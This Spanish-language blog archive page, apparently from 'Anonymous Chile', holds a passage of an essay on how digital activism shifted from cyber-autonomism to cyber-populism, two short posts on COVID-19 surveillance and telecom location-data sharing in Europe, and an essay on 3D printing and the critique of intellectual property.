Comencemos por el movimiento anti-globalización y su activismo digital. Las activistas anti-globalización persiguieron lo que puede llamarse una estrategia “ciber-autonomista” que veía a la Internet como un espacio donde construir islas de resistencia por fuera del control del estado y el capital. Como el nombre sugiere, esta lógica comunicacional se revolvía en la idea de crear espacios autónomos de comunicacion dentro de la Internet, fuera de una sociedad controlada por el capital y el estado. Como propuse anteriormente (Gerbaudo, 2014), las activistas estaban convencidas de que la construcción de infraestructura de comunicación autónoma era una condición fundamental para una comunicación alternativa genuina (2014). Basándose en la tradición de los medios alternativos de los ’60 a los ’80, en un contexto de prensa underground, cultura del fanzine y radios piratas, las activistas técnicas esperaban usar la Internet para romper el monopolio de los medios informativos corporativos, responsables de canalizar propaganda neoliberal y el silenciamiento de cualquier punto de vista alternativo. Esta visión fundaba un conjunto de iniciativas de medios alternativos que se desarrollaron a finales de los ’90 y comienzos de los 2000 (Pickard, 2006).

La manifestacion más visible de esta estrategia fue Indymedia, la primera iniciativa global de noticias alternativas con decenas de nodos editoriales repartidos por el mundo. En el pico de las protestas anti-cumbres, Indymedia se convirtió en la voz no-oficial aunque semi-oficial del movimiento anti-globalización y también constituyó una infraestructura organizacional fundamental para las manifestantes, con nodos editoriales actuando a menudo como colectivas políticas directamente involucradas en la organización de las campañas de protesta. Además de Indymedia, los servicios alternativos de Internet como RiseUp, Aktivix y Autistici/Inventati proveían las necesidades de comunicación interna del movimiento. Estos grupos proveyeron cuentas de correo electrónico personales seguras así como listas de correo que permitían conversaciones agrupadas por temas, desde organización de protestas a ocupas y permacultura. El imaginario subyacente a estas actividades era el de “islas en la red”, como expresaba el nombre de uno de los proveedores de Internet más importantes de Italia. Las activistas pensaban la Internet como zonas autónomas temporales descritas por Hakim Bey, un espacio que comprendía islas temporales de un archipiélago rebelde fuera del control del estado y el capital. La Internet era concebida como un espacio autónomo donde el movimiento podía encontrar un lugar solidario para desarrollar acciones frente al ofrecido por la sociedad consumista dominada por la hegemonía neoliberal. Esta es la razón por la que la actitud tecno-política de esta fase también era fuertemente contra-cultural. Veía a la Internet como un espacio donde cultivar una cultura alternativa, claramente diferente de la cultura mayoritaria del momento, considerada irremediablemente corrupta. Podría considerarse que el movimiento de las plazas es la inversa de esta posición.

El movimiento de las plazas y el ciber-populismo

El activismo digital del movimiento de las plazas se caracteriza en cambio por una orientación tecno-política que he descrito como “ciber-populista” (2014). Con esto defino una orientación tecno-política que considera la web de masas compuesta por servicios de Internet comerciales controlados por corporaciones monopólicas como Facebook, Google y Twitter, como un espacio que a pesar de sus sesgos capitalistas inherentes necesita ser reapropiado por el activismo y cuya capacidad de alcance masivo necesita ser domada y utilizada para otros fines. Antes que crear una Internet alternativa –un espacio comunicacional libre, auto-gobernado y no-comercial– las activistas técnicas contemporáneas están más preocupadas por domar las capacidades de alcance de las plataformas de redes sociales corporativas como Facebook y Twitter y la cultura popular digital que ha emergido en ellas.

Los ejemplos de esta tendencia ciber-populista abundan en la ola de protestas del 2011, desde la página de Facebook de Kullena Khaled Said en Egipto llamando a que cientos de miles de personas tomen las calles, al trabajo de las activistas en España, Grecia, Estados Unidos, Turquía y Brasil, que usaron los social media como un medio de movilización masiva. En lugar de intentar crear espacios alternativos, las activistas digitales dentro de estos movimientos intentaron ocupar el mainstream digital, apropiándose de los social media como plataformas del pueblo.

Esta estrategia lleva la marca de la ambición popular y mayoritaria de la ola Ocuppy y el hecho de que estos nuevos movimientos no se contentan con la construcción de espacios minoritarios de resistencia. Al utilizar las plataformas de redes sociales corporativas las activistas invaden los espacios que saben, no les pertenecen y sobre el cual tienen poco control, pero lo hacen persuadidas de que es necesario tomarlos para construir formas de movilización popular a medida de las condiciones técnicas de nuestra era. En lugar de apuntar a crear zonas autónomas temporales en la Internet como sus predecesoras, la nueva generación de activistas digitales desean romper los guetos y reconectar con el 99% de la población por la que luchan. Podría describirse esta posición como más “oportunista” por cuanto intenta explotar las oportunidades políticas que se desenvuelven en un espacio moralmente ambiguo por su subordinación a la lógica del mercado. Sin embargo, este elemento también ha permitido a estos movimientos ser exitosos y lograr una magnitud movilizatoria que evidentemente supera la alcanzada por las activistas anti-globalización.

Conclusión

Para comprender la transformación del activismo digital es necesario prestar atención no solo solo a los cambios en la materialidad de la tecnología, sino también a los factores culturales, sociales y políticos que dan forma a su comprensión y uso. Por eso resulta imperativo recuperar la noción de ideología, entendida como el sistema de creencias y valores que informan la cosmovisión activista en cualquier período histórico.

Como he demostrado en este artículo, las diferencias entre la primera ola de activismo digital que se dio en el cambio de milenio y la segunda entre el 2000 y el 2010, no solo han seguido la forma de la transformación de la tecnología digital y el giro de la web 1.0 a las plataformas de redes sociales de la web 2.0, sino también por cambios en la ideología de estos movimientos conectados, en particular el cambio del anarco-autonomismo del movimiento anti-globalización hacia el populismo del movimiento de las plazas. Este giro ideológico se ha traducido, en el contacto del activismo digital, en un giro del ciber-autonomismo hacia el ciber-populismo, dos orientaciones tecno-políticas con diferentes asunciones sobre el rol de la tecnología digital tanto como medios y como espacios de lucha. Mientras el ciber-autonomismo concibe la tecnología digital como un espacio autónomo separado del estado y el capital, el ciber-populismo la concibe como un espacio de encuentro y movilización popular.

Esta interpretación ideológica del activismo digital no ignora el rol que juega la tecnología al dar forma a la acción colectiva. El activismo digital ciertamente refleja la naturaleza de las capacidades tecnológicas. Por ejemplo, el proceso de masificación de la web que se dio en paralelo a la difusión de los social media explicaría el giro desde una lógica minoritaria a una mayoritaria de movilización en el activismo digital. Sin embargo, la transformación tecnológica no es el factor determinante. Sus efectos en el contenido del activismo son filtrados por narrativas ideológicas y cosmovisiones que contribuyen a dar forma al modo en que las activistas conciben la Internet como un campo de lucha político, un aspecto que puede capturarse en la noción de “orientaciones tecno-políticas” utilizada en este artículo.

Lo que resulta necesario es por lo tanto investigación que pueda dar mejor cuenta de las formas complejas en las que la ideología da forma a las prácticas activistas y su contenido. Esta perspectiva permitiría superar algunas de las superficialidades en las que incurren muchos de los análisis contemporáneos del activismo digital y abordar mejor la forma en que este activismo refleja los temas, actitudes y motivaciones de los movimientos sociales conectados, aparte de los factores tecnológicos.

Edward Snowden: Coronavirus, una excusa para el espionaje y vigilancia indiscriminada

Publicada el 28/04/2020 - 02/08/2021 por Anonymous Chile

Los gobiernos de todo el mundo están empleando todos los recursos tecnológicos a su disposición para hacer frente a la pandemia del coronavirus/COVID-19, aunque en ocasiones esto podría violar la privacidad de los usuarios, mencionan especialistas en seguridad de la información.

Una de las afirmaciones más polémicas al respecto fue expuesta por Edward Snowden, el ex contratista de la CIA encargado de las filtraciones de la NSA, que declaró recientemente sobre la pandemia y la actitud de los gobiernos: “Cuando se aprueban medidas de emergencia, especialmente en estos días, éstas tienden a ser invasivas y duraderas. La emergencia se expandirá y, sin darnos cuenta, las autoridades han adquirido nuevas facultades sobre nosotros”, afirma Snowden.

Los expertos en seguridad de la información mencionan que las acciones de Snowden fueron fundamentales para volver la protección de datos un asunto fundamental. Actualmente aislado en Rusia, Snowden afirma que los gobiernos podrían aprovechar de la pandemia para adoptar medidas de recolección de datos y vigilancia mucho más severas, además de que las medidas podrían extenderse al tiempo posterior a la emergencia.

En esta ocasión, los gobiernos del mundo podrían estar en búsqueda de la recolección de datos biométricos, lo que podría resultar muy útil para llevar las actividades de vigilancia a otro nivel: “Los gobiernos ya tienen acceso a lo que vemos en Internet. Ahora podrían acceder a nuestro ritmo cardiaco, presión arterial, entre otros; ¿qué pasará cuando combinen esta información con la inteligencia artificial?”, cuestiona Snowden.

Por ejemplo: un hombre en E.U. mira un video de YouTube de un funcionario federal dando un discurso. Si el discurso lo hace enojar, el pulso y frecuencia cardíaca del usuario incrementarán, lo que quedará registrado en su smartphone. Empleando algoritmos y esta información biométrica, este individuo podría ser registrado en una lista de potenciales terroristas, mencionan los especialistas en seguridad de la información.

Si bien esto podría parecer una exageración, la pandemia ya ha sido aprovechada por los gobiernos de algunas partes del mundo para incrementar sus actividades de recolección de datos. China, por ejemplo, ha exigido a sus habitantes instalar una aplicación móvil que les asigna códigos que representan su estado de salud. No se conocen detalles adicionales sobre esta política, aunque se han filtrado múltiples reportes sobre esta nueva forma de recolección de datos.

Acorde al Instituto Internacional de Seguridad Cibernética (IICS), los gobiernos de todo el mundo deben garantizar que la crisis de salud actual no debe ser aprovechada para incrementar la extracción de datos de usuarios de tecnología.

Operadoras de telefonía filtran datos para vigilar presuntos contagios

Publicada el 28/04/2020 - 02/08/2021 por Anonymous Chile

Una nueva estrategia para combatir la pandemia será implementada a la brevedad. Acorde a instructores de un curso DPO, los países miembros de la Unión Europea comenzarán a adoptar las medidas establecidas por algunos países asiáticos sobre el uso compartido de datos móviles con el fin de dar seguimiento a algunos casos de coronavirus, sin desapegarse de la legislación europea de protección de datos.

Un informe del grupo de cabildeo GSMA, las compañías de telecomunicaciones han decidido compartir los datos de ubicación de los usuarios con las autoridades europeas. Entre las compañías que han decidido unirse a esta iniciativa están:

  • Vodafone
  • Deutsche Telekom
  • Orange
  • Telefónica
  • Telecom Italia

Los especialistas del curso DPO han señalado la posibilidad de que el gobierno comience a usar la tecnología para monitorear las actividades de los usuarios en cuarentena y rastrear nuevos brotes de coronavirus, lo que representa un incremento en las actividades de vigilancia gubernamental.

En recientes declaraciones, un representante de la Comisión Europea mencionó que se emplearán los datos de ubicación de los usuarios para rastrear a usuarios movilizándose a centros hospitalarios para identificar algunas métricas sobre la propagación del virus. Por otra parte, la Comisión asegura que esta información se manejará de forma anónima: “No buscamos centralizar la información de los usuarios o vigilar a las personas”, afirma la Comisión.

Cabe mencionar que los datos anónimos no están contemplados en el Reglamento General de Protección de Datos (GDPR) de la UE, aunque la Comisión asegura que estas medidas no violan de ninguna forma esta legislación, no obstante, es necesario hacer algunas aclaraciones: “La Comisión debe definir con claridad qué información estará recolectando, además de asegurar que esta medida sea aplicable sólo hasta que pase la pandemia”, consideran los expertos del curso DPO.

El Instituto Internacional de Seguridad Cibernética (IICS) considera que la principal preocupación respecto a esta medida es la posibilidad de que sea implementada de forma permanente, por lo que no debe abandonarse el seguimiento a esta decisión.

Países como Singapur y Taiwán están empleando diversos métodos para recolectar información sobre los brotes de coronavirus, siendo la centralización de datos el principal, aunque la legislación en protección de datos en estos territorios es menos enérgica o, en múltiples casos, inexistente.

Los átomos exigen libertad

Publicada el 27/04/2020 - 14/03/2022 por Anonymous Chile

Introducción

Casi tan pronto como la impresora 3D apta para el público general se convirtió en un producto ampliamente disponible al público, surgió el primer conflicto sobre la propiedad intelectual de los objetos tridimensionales imprimibles. En febrero del 2011, Thingiverse, un repositorio de archivos de este tipo de objetos, propiedad de los fabricantes de impresoras 3D Makerbog Industries, recibió su primera carta de cese y desistimiento (cease & desist). El diseñador que la envió, Ulrich Schwanitz, hizo un reclamo de propiedad sobre un objeto que había sido subido a Thingiverse. El objeto en cuestión era un modelo de un “Triángulo de Penrose”. Se trata de una muy conocida ilusión óptica donde los lados del triángulo terminan en lugares incorrectos. El objeto no puede existir sino como una representación bidimensional en papel. Schwanitz había diseñado un objeto tridimensional que, al ser observado desde el ángulo correcto, se asemejaba a un Triángulo de Penrose. Un usuario de Thingiverse le había hecho ingeniería inversa a partir de una foto. Temiendo responsabilidad secundaria bajo la Digital Millenium Copyright Act, Makerbot Industries decidió eliminar el archivo, aunque la situación legal era altamente incierta. La representación bidimensional original del Triángulo de Penrose se encuentra en el dominio público y no resulta claro si Schwanitz reclamó derechos sobre el archivo de diseño, es decir sobre el código de software, sobre los planos de la estructura del objeto o sobre la foto con la imagen del Triángulo de Penrose. Después de las protestas públicas, Schwanitz renunció a los cargos y liberó el diseño (Rideout, 2012). Sin embargo, este primer encuentro ha sido seguido por reclamos corporativos más estridentes y poderosos. Resulta interesante que el primer reclamo de copyright sobre objetos tridimensionales imprimibles haya concernido a una forma que, en términos lógicos, no puede existir en el espacio físico sino como una ilusión óptica.

Ya un año antes de la debacle de Penrose, muchos hobbistas de la comunidad que estaba construyendo impresoras tridimensionales libres ya habían expresado sus dudas sobre el rol de Thingiverse. En respuesta a estas dudas, uno de los fundadores del servicio de compartición de archivos sueco The Pirate Bay lanzó un nuevo sitio web llamado “The Product Bay”. Se anunció que este repositorio estaría enteramente dedicado a la libertad de la información. En conjunto con esta iniciativa, jóvenes seguidores del Partido Pirata de Suecia visitaron ferias de muebles y diseño con la idea de llevar el mensaje a vendedores de IKEA y diseñadores profesionales: sus días estaban contados, así como los de los intermediarios de las industrias de la música y el cine. Esta amenaza, o promesa, llega directo al corazón de los fundamentos detrás del desarrollo de la impresora tridimensional libre. La tecnología fue desarrollada por un grupo de hobbistas y hackers con el objetivo explícito de expandir el conflicto de la propiedad intelectual sobre bienes tangibles, físicos. (Bowyer, 2004) Un indicio de esto es un proyecto auxiliar de la impresora tridimensional: el desarrollo de un escáner tridimensional de fácil uso, que sostiene la promesa de evitar, en el espacio físico, cualquier tipo de control que las autoridades legales podrían intentar ejercer sobre los repositorios y redes informáticas. Con un escáner tridimensional trabajando junto a la impresora tridimensional, los archivos de diseño pueden ser generados (es decir, escaneados) directamente desde los objetos físicos existentes.

La proposición de que el escaneo y la impresión tridimensionales harán a los bienes físicos tan copiables como el código de software está abierta a desafío. La afirmación presenta una vaga semejanza con lo que la máquina existente puede realmente hacer. Aquí voy a dejar de lado las objeciones técnicas que uno pueda tener sobre esta idea (Söderberg, 2013). En el presente artículo, el imaginario que impulsa el desarrollo de la tecnología casera en una u otra dirección. El mérito principal de la impresora tridimensional libre es que presenta una narrativa donde los “átomos” y los “bits” convergen. Esta convergencia desestabiliza un número de límites disciplinarios y teorías asociadas dentro de la academia. El estudio de los nuevos medios y la comunicación es empujado hacia un circuito más amplio de producción, mercantilización y relaciones laborales. En otras palabras, la vieja crítica de la economía política se reafirma sobre el ya-no-tan-nuevo campo subjetivo. En este artículo intento movilizar el análisis de la economía política contra la crítica predominante de la propiedad intelectual. La convergencia muestra que no hay límites duros entre la propiedad privada (sobre átomos) y la propiedad intelectual (sobre bits o ideas). La excepcionalidad de la información frente a los bienes físicos, proclamada tanto por practicantes como por académicos, es la base no tan firme sobre la que se ha construido la crítica de la propiedad intelectual. A continuación, sugiero que este argumento descansa sobre el limitado autoentendimiento de los militantes del Software Libre y el Código Abierto, combinado con las limitadas presunciones teoréticas del paradigma económico clásico y, hasta cierto punto, neo-clásico. En resumen, este límite proviene de una naturalización de la propiedad privada.

Cuando los hackers y hobbistas mudan su atención desde el software (privativo) hacia el hardware (cerrado), la economía industrial como un todo resulta implicada en su crítica a la propiedad intelectual. La propiedad intelectual es puesta en igualdad de condiciones respecto de la propiedad privada. Para los seguidores de la impresora tridimensional libre, esto es percibido como un avance contra los defensores de los derechos adquiridos y la propiedad intelectual. Pero la decisión de hackers y hobbistas de abrir un nuevo frente en la lucha contra la propiedad intelectual puede tener una interpretación diferente. Podría reflejar desarrollos que se están dando en el régimen de propiedad en su conjunto. De acuerdo con esta interpretación, la propiedad intelectual, lejos de volverse obsoleta por los avances tecnológicos recientes, comienza a convertirse en la forma predominante de propiedad. Los bienes físicos no serán excusados por los rasgos más ofensivos de la propiedad intelectual, como los intrincados esquemas de discriminación de precios y las técnicas de restricción digital de derechos. Adicionalmente a la impresora tridimensional y otras herramientas digitales de fabricación, el surgimiento de la así llamada “Internet de las Cosas” y la “realidad aumentada” apunta en la misma dirección: un desangramiento del ámbito virtual e informacional hacia la existencia corpórea. En correspondencia con este movimiento, uno podría prever un futuro donde la propiedad, los intercambios de mercado, la extración de rentas y las relaciones laborales fueran reguladas a través de lo que elijo llamar “propiedad aumentada”. El empuje hacia la propiedad aumentada demuestra que la naturalización ha sido abandonada por la sección más avanzada del partido capitalista, es decir el Colectivo de Pensamiento Neo-Liberal (Mirowski, 2013). La lección constructivista ha sido aquí adoptada porque promete que la propiedad y los mercados pueden ser construidos hasta el final.

Las dos fuentes de la crítica predominante a la propiedad intelectual

A principios de los ’80, la regulación del copyright fue extendida en la mayoría de los países occidentales: de limitarse a las obras literarias y artísticas pasó a ocuparse también del lenguaje entendible por máquinas, es decir, del código fuente. En correspondencia con esta expansión del régimen de propiedad, surgió la resistencia al mismo. Fue En ese momento que Richard Stallman inventó el concepto de Software Libre y creó una licencia que lo acompañara. La Licencia Pública General explotaba los derechos contractuales otorgados al autor de una obra bajo copyright, para especificar las condiciones bajo las que su obra podía ser usada. Las condiciones impuestas por la GPL aseguraban el acceso público a una obra al “excluir a los excluidores”. El armamento retórico contra la propiedad intelectual fue desarrollado durante la misma década. Stewart Brand, el editor del Whole Earth Catalogue, veterano del movimiento contracultural estadounidense de los ’60 y pionero del underground informático, articuló los principios clave de lo que luego se convertiría en la crítica predominante de la propiedad intelectual:

 La información quiere ser libre. La información también quiere ser cara. La información quiere ser libre porque se ha vuelto demasiado barata de distribuir, copiar y recombinar como para medirlo. Quiere ser cara porque puede ser inmensamente valiosa para el receptor.

(Brand, 1987, p. 202)

Brand identificó correctamente dos tendencias en conflicto y las situó en una economía de la información. A continuación contrastó la unicidad de la economía de la información con la ordinariez de la economía en su conjunto. La excepcionalidad de la información consiste en que esta puede ser copiada indefinidamente, convirtiéndose por lo tanto en un bien no rival. En contraste, los bienes físicos tangibles son escasos y rivales. La unión entre, por un lado, una afirmación (ontológica) sobre lo que la información es y, por el otro, la teoría económica clásica y neo-clásica sobre la escasez, proveyó la piedra fundacional del argumento de Brand contra la propiedad intelectual. La integración de ideas económicas listas para usar en este movimiento social emergente apunta a otra conexión subterránea entre la contracultura y la cibercultura, de la que Steward Brand era uno de los exponentes clave (Turner, 2008). Su línea de razonamiento ha sido desde entonces infinitamente elaborada y extendida por hackers, compartidores de archivos y activistas, así como por simpatizantes académicos. Puede resumirse sucintamente en el grito de protesta: “la información quiere ser libre”. En pos de hacer una crítica de esta crítica, empiezo por retomar la forma en que la “información” ha sido conceptualizada y construida, para luego discutir cómo la teoría económica apuntala esta posición.

El objeto-frontera: la excepcionalidad de la información

El académico de la comunicación Dan Schiller ha producido una crítica convincente de lo que llamó “la hipótesis de la excepcionalidad de la información”. Resulta una falacia, dice, exigir un trato diferencial para la información en relación a otros bienes. Resulta difícil incorporar este argumento porque las diferencias entre la información (digital) y los bienes físicos parecen ser auto evidentes. Para evitar una rechazo visceral a este argumento, comenzaré por una maniobra de flanqueo desarrollada en los estudios de la ciencia constructivista. Poniendo entre paréntesis la cuestión de la verdad y los hechos, los académicos de los estudios sobre la ciencia evitan empantanarse en debates sobre el realismo. El foco puede ser puesto en cambio en cómo la resemblanza entre hechos y realidad es producida por varios facultativos. Soy el primero en reconocer que el desvío constructivista puede llevar al estravío, especialmente si se encierra en una descripción positiva del mundo en su propio derecho. Cuando es utilizado en un sentido más restrictivo, como una maniobra de flanqueo para llegar a lo esencial de un argumento, puede ser legítimo. Si es utilizado sabiamente, el desvío constructivista ayuda a obtener matices que se perderían en un razonamiento que comienza y termina con una afirmación positiva de cómo es el mundo. Aquí propongo tomar tal desvío para aflojar algunas certitudes sobre la naturaleza de la información (discreta, no rival, etc.). Por el momento, pondré entre paréntesis la pregunta sobre si puede decirse que la información es realmente diferente de los bienes tangibles, físicos. Volveré en la segunda mitad del texto sobre esto y por lo tanto sobre la crítica de Dan Schiller. Primero necesito historizar la comprensión heredada sobre lo que es la información.

El proceso por el cual “la información” fue definida y construida ha sido extensamente debatido en las ciencias sociales. Tengo muy poco que agregar a este debate, pero daré algunos indicios sobre este para poder llegar al argumento que quiero desarrollar aquí. Como es bien sabido, el artículo seminal de Claude Shannon Una teoría matemática de la comunicación, de 1948, fue clave para definir la conceptualización dominante de la información (Shannon, 1948). Él buscó definir la información en términos de codificación y transmisión de mensajes. En otras palabras, como señales indiferentes al significado que el receptor les otorga. Como argumentó Rafael Capurro, esto marcó una línea divisoria en relación a cómo era entendida la información en épocas anteriores, llegando hasta los días de los griegos y los romanos. El concepto de información solía tener un significado más amplio que “enviar mensajes”. Implicaba el acto de dar forma a algo, como por ejemplo al conocimiento o a la mente humana. Esto implicaba un concepto de lenguage dependiente del contexto y de la creación de sentido. (Capurro, 2009). No es accidental que el contexto y el significado hayan sido sacados de la ecuación por Shannon. Katherine Hayles ha demostrado cómo su definición respondía a las necesidades de una industria tecnocientífica en ascenso. La industria quería una definición que le permitiera cuantificaciones confiables. Otras definiciones, para las cuales la información y su contenido eran considerados parte de un todo inseparable, fueron propuestas en ese momento. Tomar esta noción de “información como significado” requería, sin embargo, alguna forma de medir qué había cambiado en la cabeza del receptor. Fue este tipo de consideraciones prácticas lo que persuadió a la comunidad científica de quedarse con una definición estrecha, matemática y descontextualizada de la información (Hayles, 1999). Desde entonces un mundo entero ha sido erigido alrededor de esta noción de información, para hacerla funcionar de la forma en la que fue concebida originalmente.

Por supuesto y a pesar de los esfuerzos en sentido contrario, los eventos de creación, transmisión y operacionalización de la información permanecieron situados y encarnados, no pudiendo quedar completamente divorciados de la creación de sentido. Aunque puede ser relevante por otras razones distinguir entre conocimiento e información, como muchos críticos culturales han hecho, éstos no son antitéticos en el sentido de que uno conlleva significado y el otro no (Malik, 2005). La separación de la información del sustrato material en el cual está inevitablemente inscrita debe ser reconocida como una invención cultural. A partir de ella se han derivado nociones sobre el “ciberespacio” y la “realidad virtual”. En los ’90, Internet era habitualmente representada como un reino incorpóreo de flujos de información. La atracción de esta idea puede ser explicada parcialmente porque tomaba fuerza de un milenario dualismo en el pensamiento filosófico, a veces referenciado como una oposición entre forma y materia, otras como mente y cuerpo y así (Fuchs, 2003; Hayles, 1994). En la bibliografía sobre los estudios de los nuevos medios han proliferado también variantes de este dualismo. Por ejemplo, la misma oposición tiende a resurgir cuando la “comunidad virtual” es contrastada con las comunidades reales ancladas geográficamente (para una crítica, ver Proulx y Latzko-Toth (2005)). Entre los juristas se ha desencadenado una discusión paralela que debate si los mundos virtuales constituyen una jurisdicción separada que requiere leyes epecíficas (Lastowka & Hunter, 2004).

La noción del ciberespacio como un reino incorpóreo de intercambio de información ha sido puesta bajo una crítica sostenida por feministas y estudiosos de la cultura. En lugar de reiterar estas críticas, se debería redimir la posición contraria, a pesar de lo defectuosa que pueda ser. Hay que tener en mente que la postulación de un Más Allá trascendental ha servido históricamente como un punto para la crítica y la oposición a aquello que existe. Algunos ejemplos incluyen el Reino de los Cielos, los derechos naturales y el determinismo tecnológico (o histórico). La actualmente infame declaración de independencia del ciberespacio de Perry Barlow puede ser considerada en todo derecho una continuación de esta larga, potencialmente crítica y emancipatoria tradición. En efecto, la declaración hubiera sido inútil si Barlow no hubiera pensado que el ciberespacio se colaría en y cambiaría los estados del mundo industrial (Barlow, 1996). La lección es la siguiente: en el momento en que algo (información, ciberespacio, etc.) es puesto como un Más Allá separado y enfrentado a sus alrededores, ya ha derramado ese límite y ha comenzado a afectar lo de “afuera”. La misma estrategia es adoptada por los adversarios del régimen actual de la propiedad intelectual cuando adoptan la hipótesis de la excepcionalidad de la información.

La observación anterior puede ser desarrollada tomando prestados dos términos populares de los estudios de las ciencias: trabajo-frontera y objetos-frontera. El primer término fue propuesto por Thomas Gieryn. Lo utilizó para describir cómo la ciencia es separada de la no-ciencia por los esfuerzos de los científicos para sostener su estatus profesional frente a científicos amateurs y contendientes religiosos. La lección que vale la pena enfatizar en el contexto del presente argumento es que el límite no está dado naturalmente. No existe independientemente del paradero del profesional. El límite debe ser perpetuamente sostenido, defendido y re-negociado (Gieryn, 1983). El segundo término fue introducido por Susan Leigh Start y James Griesemer. Su contribución consistió en tratar el límite no solamente como un marcador de diferencia sino también como una interfaz que habilita la comunición a través de comunidades científicas y heterogéneas. El objeto-frontera era lo suficientemente plástico como para adaptarse a las necesidades locales, a la vez que lo suficientemente robusto como para mantener una identidad común a través de distintos sitios (Lamont & Molnár, 2002; Star & Griesemer, 1989). La definición original del trabajo-frontera no coincide perfectamente con la hipótesis de la excepcionalidad de la información descrita más arriba. El límite entre los recursos informacionales y los bienes físicos no es un hecho dado. Debe ser sostenido a través de trabajo continuo. La excepcionalidad de la información y la separación del reino virtual constituyen el objeto-frontera de los militantes por un fondo común de la información.

En consonancia con la concepción del término sostenida por Susan Leigh Start y James Griesemer, la vaguedad de la noción de “información” no es una falla sino una fortaleza. Es esta imprecisión la que permite a los hackers y activistas de variadas persuasiones comunicarse y colaborar entre sí. Esto es probablemente más importante para los hackers que para la comunidad científica promedio, dadas sus marcadas diferencias ideológicas. Esto corresponde de alguna forma con la observación sobre el “agnosticismo político” de los hackers descrito por Gabriella Coleman (2004). Hay un costado menos inocente en esta historia. Como clarificaron Geoffrey Bowker y Susan Leigh Star en una obra posterior, las clasificaciones que establece un objeto-frontera tienen sesgos que validan algunos puntos de vista mientras que vuelven invisibles o inefables otras posiciones (Bowker & Star, 1999). Aquello que se ha vuelto invisible en el objeto-frontera de “la excepcionalidad de la información” puede ser visto en una cita de uno de los principales arquitectos detrás del movimiento de las licencias Creative Commons, Lawrence Lessig. Después de haberse presentado apasionadamente en favor de que la información y la cultura deban ser distribuídas en un fondo común y gratuitamente, Lessig reasegura a sus lectores que los mercados y los fondos comunes pueden coexistir uno al lado del otro. Subraya que no todos los recursos pueden ni deben ser organizados en un fondo común:

Mientras que algunos recursos deben ser controlados, otros pueden ser provistos mucho más libremente. La diferencia está en la naturaleza del recurso y por lo tanto en la naturaleza de cómo el recurso es provisto.

(Lessig, 2001)

Está en la naturaleza de los recursos informacionales no rivales estar organizados en un fondo común. En la misma línea, los recursos tangibles y rivales, se piensan como adecuados para los mercados. Es la naturaleza del recurso lo que determina si un producto es rival o no rival. Mientras se dice que la propiedad intelectual crea escasez, la propiedad tradicional se asume como fundamentada en limitaciones que existen objetivamente en el mundo real. Por implicación, la propiedad de bienes tangibles y rivales es vista como “operacional”, por no decir “óptima”. La misma línea de pensamiento apuntala el argumento de Yochai Benkler, que no ha sido menos influyente en la conformación de la crítica predominante de la propiedad intelectual actual:

En el contexto de la información, el conocimiento y la cultura, por la no rivalidad de la información y sus características como entrada y también como salida del proceso productivo, los comunes proveen un contexto cuya seguridad es sustancialmente mayor que lo que sucede cuando recursos materiales, como los parques y las autopistas, están en juego.

(Benkler, 2006, p. 146)

Aun más que Lawrence Lessig, Yochai Benkler reconoce que su razonamiento descansa sobre condiciones sociales y tecnológicas que son transitorias. Como consecuencia, la balanza entre comunes y mercados puede cambiar y necesita ser reevaluada de tiempo en tiempo. Sin embargo, Benkler entiende el cambio social y el tecnológico como factores externos que actúan sobre sus computaciones desde un Afuera. Lo que pasa desapercibido es que esos factores son parte de un conflicto social más amplio, en el que los dos juristas toman partido. Lo que está en juego en esta lucha es precisamente la línea de demarcación entre comunes y mercados. La idea de que el punto de balance óptimo entre comunes y mercados puede establecerse de una manera técnica y neutral es ficticia. Lessig y Benkler no son inconcientes de la presencia de una lucha, pero la rebajan a maquinaciones de legisladores desinformados y/o corruptos. Puede recolectarse suficiente evidencia para apoyar esta afirmación, pero ésto deja fuera lo más fundamental. Esto se debe al límite establecido por la hipótesis de la excepcionalidad informacional. Afirma que una crítica de la propiedad intelectual actual no implica a su vez una crítica general de la propiedad privada como tal. Afirma que la militancia por los comunes informacionales no es a la vez un ataque al libre mercado.

El sesgo del objeto-frontera debe ser respetado por todo el público geek bajo pena de quedar marginalizado. Esto incluye a los críticos de la propiedad intelectual, típicamente identificados como “izquierdistas”. Por ejemplo, Richard Stallman, el fundador de la Free Software Foundation, insiste en no usar el término “propiedad intelectual”. Argumenta que este término causa confusión al juntar un rango de legislaciones diferentes bajo un término abarcativo (Stallman, 2006). Este deseo de separar la propiedad privada de la crítica de la propiedad intelectual es también sugerida por la frase, pegadiza e icónica, de la Free Software Foundation: “libre como la libre expresión, no como la cerveza libre”. Al enmarcar el problema de esta forma, el caso de los comunes informacionales puede ser retratado como una defensa de las libertades civiles, en lugar de ser visto como un ataque a la propiedad privada y, por lo tanto, como una lucha por la redistribución económica. Nadie puede negar que esta forma de presentar el problema tiene ventajas tácticas. Tal vez, incluso el caso por los comunes informacionales se vuelve más eficiente como crítica a la propiedad privada y al libre mercado al no exponerse como tal. A la vez, esto sugiere el arraigo de la crítica a la propiedad intelectual en una visión del mundo liberal, enmarcada en el sentido común, ampliamente definida y sistematizada en la disciplina económica.

La abundancia: la anomalía en las ciencias económicas (neo)clásicas

La hipótesis de la excepcionalidad de la información explota una anomalía en un paradigma (científico), esto es, la disciplina económica y sus tradiciones predominantes, buena parte de la teoría clásica y toda la neoclásica (Daoud, 2010, 2011). Uso el término “anomalía” en el sentido estricto que le da Thomas Kuhn (1996). En su clásica teoría de la ciencia, para decirlo resumidamente, una anomalía es definida como algo que contradice la sabiduría científica imperante del momento. Resulta difícil incluso tomar conciencia de la inconsistencia, e imposible resolverla dentro de esa cosmovisión científica del momento. Por lo tanto, una anomalía apunta más allá del orden establecido, hacia un nuevo paradigma científico que pueda explicar mejor los datos observados. Sin embargo, como ninguna forma de conceptualizar el mundo puede dar una explicación de la realidad última y exhaustiva, nuevas anomalías están destinadas a aparecer.

